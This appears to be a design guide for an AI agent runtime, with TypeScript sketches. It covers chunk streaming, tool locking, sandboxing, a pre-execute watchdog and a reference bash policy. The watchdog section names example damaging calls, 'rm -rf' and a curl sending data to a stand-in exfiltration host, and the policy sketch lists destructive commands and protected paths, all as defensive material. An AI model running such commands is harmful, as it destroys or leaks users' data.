Foundations
Bedrock — the assumptions the rest of the guide rests on. An
implementor MAY swap any of these, but each swap pulls a
cross-cutting change. Read index first for the
vocabulary.
Streaming substrate: AI SDK v6
The agent system's wire format is the AI SDK v6 UIMessageChunk
stream. Every assistant turn — whichever model, whichever provider,
whichever runtime path — emits the same chunk vocabulary
(text-{start,delta,end}, reasoning-{start,delta,end},
tool-input-{start,delta,available},
tool-output-{available,error}, file, source-url,
source-document, data-*, finish-step, finish).
Why this pin. The AI SDK chunk shape is the only piece of the system that crosses both the provider boundary and the host boundary. If the recorder, the resume layer, the renderer, and the canonical inspection format all agree on the chunk shape, every other layer moves independently. Pinning is cheaper than translating.
What the AI SDK gives this guide for free.
- Tool input streaming (tool-input-delta during a generation).
- Per-step usage capture (the onStepFinish callback the recorder taps for token rollups).
- An abort-signal model (one AbortSignal passed through the call chain).
- A reducer (@ai-sdk/react's useChat) that enforces well-formed chunk order on the consumer.
Two consequences worth naming up front.
- text-delta MUST be preceded by text-start for the same message id. A "join an in-flight stream at chunk N" feature MUST replay the chunk log from the start, not from N. See Session lifecycle / streaming.
- Tool I/O on the wire is two events, not one. The model emits tool-input-{start,delta,available} while it generates the call; the runtime emits tool-output-{available,error} when the tool returns. The session schema collapses both into one row per tool_call_id; the canonical format keeps them separate.
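The two consequences above can be sketched in TypeScript. This is a minimal illustration, not the AI SDK's own reducer: the Chunk type is a simplified, hypothetical stand-in for UIMessageChunk (field names such as id, toolCallId, and errorText are assumptions), and firstOrphanDelta and collapseToolRows are names invented for this example.

```typescript
// Simplified stand-in for the chunk stream. Field names are assumptions,
// not the AI SDK's exact UIMessageChunk definition.
type Chunk =
  | { type: "text-start"; id: string }
  | { type: "text-delta"; id: string; delta: string }
  | { type: "text-end"; id: string }
  | { type: "tool-input-available"; toolCallId: string; input: unknown }
  | { type: "tool-output-available"; toolCallId: string; output: unknown }
  | { type: "tool-output-error"; toolCallId: string; errorText: string };

// Index of the first text-delta whose id has no open text-start, or -1.
function firstOrphanDelta(log: readonly Chunk[]): number {
  const open = new Set<string>();
  let index = 0;
  for (const chunk of log) {
    if (chunk.type === "text-start") open.add(chunk.id);
    else if (chunk.type === "text-end") open.delete(chunk.id);
    else if (chunk.type === "text-delta" && !open.has(chunk.id)) return index;
    index++;
  }
  return -1;
}

// One row per tool call, the way the session schema stores it.
interface ToolRow {
  toolCallId: string;
  input?: unknown;
  output?: unknown;
  error?: string;
}

function collapseToolRows(log: readonly Chunk[]): ToolRow[] {
  const rows = new Map<string, ToolRow>();
  const rowFor = (toolCallId: string): ToolRow => {
    let row = rows.get(toolCallId);
    if (!row) {
      row = { toolCallId };
      rows.set(toolCallId, row);
    }
    return row;
  };
  for (const chunk of log) {
    switch (chunk.type) {
      case "tool-input-available":
        rowFor(chunk.toolCallId).input = chunk.input;
        break;
      case "tool-output-available":
        rowFor(chunk.toolCallId).output = chunk.output;
        break;
      case "tool-output-error":
        rowFor(chunk.toolCallId).error = chunk.errorText;
        break;
    }
  }
  return Array.from(rows.values());
}

const chunkLog: Chunk[] = [
  { type: "text-start", id: "m1" },
  { type: "text-delta", id: "m1", delta: "Reading " },
  { type: "text-delta", id: "m1", delta: "the file." },
  { type: "text-end", id: "m1" },
  { type: "tool-input-available", toolCallId: "call_1", input: { path: "README.md" } },
  { type: "tool-output-available", toolCallId: "call_1", output: "# Title" },
];

const fromStart = firstOrphanDelta(chunkLog); // replay from the start: well formed
const fromChunk2 = firstOrphanDelta(chunkLog.slice(2)); // join at chunk 2: orphan delta
const toolRows = collapseToolRows(chunkLog); // two wire events, one row
```

Replaying from the start keeps the log well formed, while joining at chunk 2 immediately hits a delta with no matching start. That is why a resume feature has to replay rather than seek.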
Native vs adapter path
A high-traffic implementor MAY skip the AI SDK call layer for cost and latency (one less round of serialization). The guide allows it as long as the resulting stream is still AI-SDK-chunk-shaped. Both paths run the same downstream code.
Implementor notes that live outside AI SDK's own documentation — the
token-usage cache normalization rule, where the SDK's tool-loop
helper fits, what the RFC adds on top of the substrate — are
collected in ai-sdk.
Outward wire vs internal stream
The AI SDK chunk shape is the internal stream — the language the
core, the recorder, the canonical inspection format, and the resume
layer all speak. When the host delivers the stream to an external
client (an editor, an IDE, another agent host), the outward wire
is ACP. A thin adapter translates AI-SDK-v6 chunks to
ACP session/update notifications without introducing buffering or
its own state. See ACP integration for the mapping.
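A stateless adapter of the kind described above might look like the following sketch. It covers only two chunk types and is an assumption about the mapping, not the mapping itself (that lives in ACP integration). InternalChunk is a simplified, hypothetical stand-in for the internal chunk shape, and toAcp is an invented name. The notification envelope follows the ACP session/update shape as far as this example needs it.

```typescript
// Simplified subset of the internal chunk stream (field names assumed).
type InternalChunk =
  | { type: "text-delta"; id: string; delta: string }
  | { type: "reasoning-delta"; id: string; delta: string }
  | { type: "finish" };

// JSON-RPC notification carrying one ACP session update.
interface SessionUpdateNotification {
  jsonrpc: "2.0";
  method: "session/update";
  params: {
    sessionId: string;
    update: {
      sessionUpdate: "agent_message_chunk" | "agent_thought_chunk";
      content: { type: "text"; text: string };
    };
  };
}

function notification(
  sessionId: string,
  sessionUpdate: "agent_message_chunk" | "agent_thought_chunk",
  text: string,
): SessionUpdateNotification {
  return {
    jsonrpc: "2.0",
    method: "session/update",
    params: { sessionId, update: { sessionUpdate, content: { type: "text", text } } },
  };
}

// Pure function of (sessionId, chunk): no buffering, no adapter-owned state.
// Returns null for chunks this sketch does not map.
function toAcp(sessionId: string, chunk: InternalChunk): SessionUpdateNotification | null {
  switch (chunk.type) {
    case "text-delta":
      return notification(sessionId, "agent_message_chunk", chunk.delta);
    case "reasoning-delta":
      return notification(sessionId, "agent_thought_chunk", chunk.delta);
    default:
      return null;
  }
}

const outward = toAcp("sess_1", { type: "text-delta", id: "t1", delta: "Hello" });
const skipped = toAcp("sess_1", { type: "finish" });
```

Because each chunk maps to at most one notification and the function reads nothing but its arguments, the adapter can be dropped in front of any transport without changing resume or recording behavior.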
Directory-rooted execution
An agent runs on top of a directory. That directory is one of:
- A workspace the user opened on their local machine.
- An ad-hoc file's containing directory (quick-open).
- A cloud sandbox provisioned for the run.
- A git worktree the user is on.
The agent's fs.* capability is bounded by that root (and any
additional roots the manifest declares — for example {user-data}
for config writes). It is never bounded by the host's whole
filesystem.
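As an illustration of the bound, a path check against the session root plus any manifest-declared roots could be sketched as below. The function name isWithinRoots and the example paths are hypothetical, the sketch assumes POSIX-style absolute roots, and it does not resolve symlinks, which a real host would also need to handle.

```typescript
import * as path from "node:path";

// True when `candidate` resolves to a location inside at least one root.
// Relative candidates are resolved against each root in turn.
function isWithinRoots(candidate: string, roots: readonly string[]): boolean {
  return roots.some((root) => {
    const resolved = path.posix.resolve(root, candidate);
    const rel = path.posix.relative(root, resolved);
    // "" means the root itself; a leading ".." segment means an escape.
    return rel !== ".." && !rel.startsWith("../");
  });
}

const sessionRoots = ["/work/repo", "/home/user/.config/agent"]; // example roots

const insideWorkspace = isWithinRoots("src/index.ts", sessionRoots);
const escapesWithDots = isWithinRoots("../other-repo/secrets.txt", sessionRoots);
const absoluteOutside = isWithinRoots("/etc/passwd", sessionRoots);
const declaredExtraRoot = isWithinRoots("/home/user/.config/agent/settings.json", sessionRoots);
```

Comparing on the relative path rather than on a string prefix avoids treating /work/repo-old as if it were inside /work/repo.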
This is the smallest assumption the rest of the guide leans on:
- Skills discovery walks upward from the root looking for .agents/skills/ and equivalents. See skills.
- System prompt includes the root, the platform, and the git status as ambient context.
- Sandbox sub-policies are expressed relative to the root.
- Subagent task calls inherit the root unless explicitly overridden.
The root is resolved at session start and is immutable for the session's lifetime. A "move to a different directory" is a new session.
Locked fundamental tools
Every implementation MUST ship the locked tool set. The 13 ids are
read, write, edit, glob, grep, bash, todo, task,
question, web_search, web_fetch, skill, tool_search.
The set is non-opinionated: each tool is the smallest thing it
can be. Models trained on tool use have learned these names; the
lock guarantees portability. Per-tool shapes, capability
declarations, and the result envelope live in tools.
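One way a host could check the lock at startup is sketched below. The 13 ids come from the list above. The constant and function names (LOCKED_TOOL_IDS, missingLockedTools) are invented for this example.

```typescript
// The locked tool ids, in the order the guide lists them.
const LOCKED_TOOL_IDS = [
  "read", "write", "edit", "glob", "grep", "bash", "todo", "task",
  "question", "web_search", "web_fetch", "skill", "tool_search",
] as const;

type LockedToolId = (typeof LOCKED_TOOL_IDS)[number];

// Returns the locked ids an implementation failed to register.
function missingLockedTools(shipped: readonly string[]): LockedToolId[] {
  const have = new Set<string>(shipped);
  return LOCKED_TOOL_IDS.filter((id) => !have.has(id));
}

const partialHost = ["read", "write", "edit", "bash"]; // hypothetical registry
const stillMissing = missingLockedTools(partialHost);
```

An empty result means the implementation ships the full set. Extra, non-locked tools do not affect the check.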
Sandbox placement
The sandbox is the host's responsibility, not the agent
system's. The runtime publishes a capability surface; the host
enforces it. See environments for the three
environments (web / cloud sandbox / computer) and their sandbox
primitives.
What the agent system guarantees in return: no free
process.spawn, no free fetch, no free fs.*. Every side
effect goes through a declared capability. The host enforces its
policy at one boundary instead of chasing every tool author.
Watchdog
A pre-execute hook on every tool call. The watchdog inspects the tool id, the validated arguments, the agent's manifest, and the session id, and returns:
- allow: the call proceeds.
- deny(reason): the call fails with a tool error. The model gets the reason on the next turn and can adjust.
- ask: only on a host with a human user; the host shows the command, the user picks once / always / reject. Headless hosts MUST treat ask as deny.
Why pre-execute and not post-tool-call. The damaging act of a
shell call (rm -rf, curl <data> exfil.example.com) is the call
itself. Post-call rejection is too late.
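The hook's contract can be sketched as a small set of types and a guard around execution. Everything named here (WatchdogDecision, ToolCallContext, resolveForHost, guardedExecute) is hypothetical and only illustrates the allow / deny / ask shape and the headless rule. The interactive approval flow itself is left out.

```typescript
type WatchdogDecision =
  | { kind: "allow" }
  | { kind: "deny"; reason: string }
  | { kind: "ask" };

// The four inputs the watchdog inspects (shapes are assumptions).
interface ToolCallContext {
  toolId: string;
  args: unknown; // already validated against the tool's schema
  manifest: unknown;
  sessionId: string;
}

type Watchdog = (ctx: ToolCallContext) => WatchdogDecision;

// Headless hosts have nobody to ask, so "ask" collapses to "deny".
function resolveForHost(decision: WatchdogDecision, hostIsInteractive: boolean): WatchdogDecision {
  if (decision.kind === "ask" && !hostIsInteractive) {
    return { kind: "deny", reason: "approval required but host is headless" };
  }
  return decision;
}

type GuardedResult<T> = { ok: true; value: T } | { ok: false; error: string };

// Pre-execute: the tool body runs only after the watchdog allows the call.
function guardedExecute<T>(
  ctx: ToolCallContext,
  watchdog: Watchdog,
  hostIsInteractive: boolean,
  execute: () => T,
): GuardedResult<T> {
  const decision = resolveForHost(watchdog(ctx), hostIsInteractive);
  if (decision.kind === "allow") return { ok: true, value: execute() };
  if (decision.kind === "deny") return { ok: false, error: decision.reason };
  return { ok: false, error: "awaiting user approval" }; // prompt flow omitted
}

let toolBodyRan = false;
const askEverything: Watchdog = () => ({ kind: "ask" });
const headlessResult = guardedExecute(
  { toolId: "bash", args: { command: "rm -rf build" }, manifest: {}, sessionId: "sess_1" },
  askEverything,
  false, // headless host
  () => { toolBodyRan = true; return "done"; },
);
```

The tool body is passed as a thunk so that a denied call never starts. That is the property the pre-execute placement exists to guarantee.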
Reference policy for bash
The watchdog is intentionally generic; the guide does not name a "dangerous" command. A reasonable reference policy:
- Allow read-only commands by default (ls, cat, grep, find, git status, git log, language-version checks).
- Ask on writes outside the workspace root, network downloads, and privileged commands.
- Deny commands that touch destructive system paths regardless of who asked.
Policies are per-host. A CI host can be stricter (ask for everything not on an allowlist). A local-dev host can be looser (allow within the workspace, ask outside).
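A deliberately naive sketch of such a reference policy follows. The read-only prefixes come from the list above. The mutating-command list, the protected paths, and the shell-metacharacter rule are assumptions made up for this example, since the guide itself names no dangerous command. Whitespace tokenization is not a shell parser, so a real policy would need proper parsing.

```typescript
type Verdict = "allow" | "ask" | "deny";

const READ_ONLY_PREFIXES = ["ls", "cat", "grep", "find", "git status", "git log"];
const MUTATING_FIND_FLAGS = ["-delete", "-exec", "-execdir"];
// Hypothetical examples only; each host defines its own lists.
const MUTATING_COMMANDS = ["rm", "mv", "dd", "chmod", "chown", "mkfs"];
const PROTECTED_PATHS = ["/", "/etc", "/usr", "/bin", "/boot"];
// Chaining, piping, redirection, or substitution defeats prefix matching.
const SHELL_META = /[;&|<>`$()]/;

function touchesProtectedPath(token: string): boolean {
  return PROTECTED_PATHS.some(
    (p) => token === p || (p !== "/" && token.startsWith(p + "/")),
  );
}

function classifyBash(command: string): Verdict {
  const trimmed = command.trim();
  const tokens = trimmed.split(/\s+/);

  // Deny: a mutating command anywhere in the line plus a protected path.
  const mutates = tokens.some((t) => MUTATING_COMMANDS.indexOf(t) !== -1);
  if (mutates && tokens.some(touchesProtectedPath)) return "deny";

  // Allow: a plain read-only command with no shell metacharacters.
  const readOnly = READ_ONLY_PREFIXES.some(
    (p) => trimmed === p || trimmed.startsWith(p + " "),
  );
  const findMutates = tokens.some((t) => MUTATING_FIND_FLAGS.indexOf(t) !== -1);
  if (readOnly && !findMutates && !SHELL_META.test(trimmed)) return "allow";

  // Everything else goes to the user (or to deny on a headless host).
  return "ask";
}

const verdicts = ["ls -la", "git push origin main", "rm -rf /etc", "ls; rm -rf build"]
  .map((cmd) => classifyBash(cmd));
```

Defaulting to ask rather than allow keeps the sketch fail-closed: anything the classifier does not recognize is surfaced instead of run.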
Watchdog vs permission rules vs sandbox
Three layers, defense in depth:
- Manifest / runtime capability. Refuses out-of-scope paths and hosts at the API boundary. No model output reaches the OS.
- Watchdog. Refuses categories of arguments the manifest cannot express ("no commands that look like exfiltration").
- Environment sandbox. Refuses whatever the runtime mistakenly let through.
Each layer is sufficient for its kind of failure. Together they form the budget for the agent to do real work.
Web search
Web search is a fundamental tool that is not implementable in-house. The host wires it to a real provider; the agent sees one tool with one input and one output shape across providers.
web_search({ query: string, max_results?: int })
→ { results: { title, url, snippet }[] }
Provider seam: the provider is the host's choice and SHOULD be stable per session (hash the session id to pick) so a flaky provider fails consistently and inspection shows one row, not a random walk.
Cost and quota: per-session call cap (default ~25); per-call timeout (default 15s) that returns a tool error rather than hanging; deterministic provider pick per session.
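The deterministic pick and the per-session cap can be sketched as follows. The hash choice (32-bit FNV-1a over UTF-16 code units), the provider names, and the function names pickProvider and createSearchBudget are all assumptions for illustration; the guide only requires that the pick be stable per session. The per-call timeout is not shown.

```typescript
// 32-bit FNV-1a over UTF-16 code units; any stable hash would do.
function fnv1a(text: string): number {
  let hash = 0x811c9dc5;
  for (let i = 0; i < text.length; i++) {
    hash ^= text.charCodeAt(i);
    hash = Math.imul(hash, 0x01000193);
  }
  return hash >>> 0; // force unsigned
}

// Same session id always yields the same provider from the same list.
function pickProvider<T>(sessionId: string, providers: readonly T[]): T {
  if (providers.length === 0) {
    throw new Error("no web search provider configured");
  }
  return providers[fnv1a(sessionId) % providers.length];
}

// Per-session call cap; the default mirrors the ~25 suggested above.
function createSearchBudget(cap: number = 25) {
  let used = 0;
  return {
    // Returns false once the cap is reached; the caller surfaces a tool error.
    tryConsume(): boolean {
      if (used >= cap) return false;
      used++;
      return true;
    },
    remaining(): number {
      return cap - used;
    },
  };
}

const providers = ["provider-a", "provider-b", "provider-c"]; // hypothetical names
const firstPick = pickProvider("sess_42", providers);
const secondPick = pickProvider("sess_42", providers);
const budget = createSearchBudget(2);
const attempts = [budget.tryConsume(), budget.tryConsume(), budget.tryConsume()];
```

Because the pick depends only on the session id and the provider list, every row in the inspection view for one session names the same provider, as long as the host does not reorder the list mid-session.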
Putting web search in the lock forces every host to wire one — the friction of bringing a key is paid once, not per agent.
Cross-cutting invariants
The following hold across every implementor:
- One universal LLM loop. Whichever agent runs, whichever model is picked, the loop is the same code. Agent specialization is config, not a fork of the loop.
- AI SDK v6 chunk shape internally. Both runtimes (native + AI SDK adapter) emit the same envelope. The chunk shape is the lingua franca inside the host.
- ACP is the recommended outward protocol. When the agent is consumed by an external client, the Agent Client Protocol wraps the internal stream. See ACP integration.
- Three-table session shape. chat_sessions / chat_messages / chat_parts, JSON for part data. Implementors that pick a different DB engine port the three tables. See Persistency.
- No free side effects. Every tool's requires is declared upfront; the runtime refuses out-of-scope calls.
- Subagents share the loop. A subagent is a child session running the same code, gated by intersected permissions. See Subagents.
- Compaction is mandatory above a threshold. No implementor ships "the model just stops working at 100% context." See Compaction.
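Two of the invariants above, declared requires and intersected subagent permissions, reduce to set operations. The sketch below assumes capabilities are plain strings such as "fs.read". That representation, and the names intersectPermissions and missingCapabilities, are hypothetical. See Subagents and tools for the actual shapes.

```typescript
type Capability = string; // e.g. "fs.read", "net.fetch" (illustrative names)

// A subagent can never hold more than its parent: keep only what both have.
function intersectPermissions(
  parent: ReadonlySet<Capability>,
  requested: ReadonlySet<Capability>,
): Set<Capability> {
  const granted = new Set<Capability>();
  requested.forEach((cap) => {
    if (parent.has(cap)) granted.add(cap);
  });
  return granted;
}

// Capabilities a tool declares in `requires` that the session does not hold.
// A non-empty result means the runtime refuses the call.
function missingCapabilities(
  requires: readonly Capability[],
  granted: ReadonlySet<Capability>,
): Capability[] {
  return requires.filter((cap) => !granted.has(cap));
}

const parentCaps = new Set<Capability>(["fs.read", "fs.write", "net.fetch"]);
const childRequest = new Set<Capability>(["fs.read", "process.spawn"]);
const childCaps = intersectPermissions(parentCaps, childRequest);

// A hypothetical tool that needs to read files and spawn a process.
const refusedFor = missingCapabilities(["fs.read", "process.spawn"], childCaps);
```

Here the child asked for process.spawn, the parent never had it, so the intersection drops it and the tool call is refused at the runtime boundary.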
See also
- Session Lifecycle — what runs on top of the AI-SDK-v6 + SQLite bedrock.
- Tools — per-tool detail of the locked set.
- Environments — sandbox primitives by host environment.
- Persistency — the three-table schema.
- ACP integration — the outward wire.